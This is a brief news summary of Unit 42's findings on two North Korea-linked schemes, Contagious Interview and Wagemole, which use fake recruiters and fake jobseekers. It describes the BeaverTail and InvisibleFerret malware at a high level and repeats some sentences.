November 22, 2023 at 08:37PM
Palo Alto Networks’ Unit 42 has identified two hacking schemes linked to state-sponsored actors in North Korea. The first scheme, called Contagious Interview, involves threat actors posing as job recruiters on job boards and tricking software engineers into downloading malware. The second scheme, Wagemole, sees threat actors pretending to be jobseekers for financial gain and espionage purposes. Unit 42 believes these schemes are run by North Korean state-sponsored actors. The researchers also discovered previously unknown malware families used in these schemes. The motive for Wagemole is not specified, but it is noted that North Korean tech workers send their wages home to fund weapons programs.
According to meeting notes from Palo Alto Networks’ Unit 42, there are two hacking schemes linked to state-sponsored actors in North Korea. The first scheme is called Contagious Interview, where threat actors pose as potential employers and trick software engineers into downloading malware-laden Node Package Manager packages from GitHub. The second scheme, called Wagemole, involves threat actors pretending to be jobseekers to gain financial gain and conduct espionage.
Unit 42 has “moderate confidence” that Contagious Interview is run by a North Korean state-sponsored actor and “high confidence” that Wagemole is one of North Korea’s campaigns. The infrastructure for Contagious Interview started appearing in December 2022, and the threat actors pose as recruiters for real and imaginary companies, advertising on job boards for various fields.
The scammers invite targets for online interviews, during which they ask the applicants to download a GitHub package. This allows the installation of info-stealers on software engineers’ systems, potentially granting access to their work or personal information.
Unit 42 discovered two previously unknown malware families used by the Contagious Interview group. One is a JavaScript-based info-stealer and loader named BeaverTail, while the other is a Python-based backdoor called InvisibleFerret. BeaverTail targets basic information and credit card details, while InvisibleFerret can keylog credentials, exfiltrate data, facilitate remote access, and download AnyDesk RMM.
While investigating Contagious Interview, Unit 42 also found documents related to the counterpart social engineering scheme, Wagemole. These documents included fraudulent CVs, stolen US permanent resident cards, fake identities from various nations, interview tips and scripts, and job postings from US companies. The motive or objective of Wagemole was not specified, but it is noted that North Korean tech workers send their wages home to fund weapons programs.
It is important to be vigilant and aware of these schemes, as the threat actors are using sophisticated methods to deceive their targets.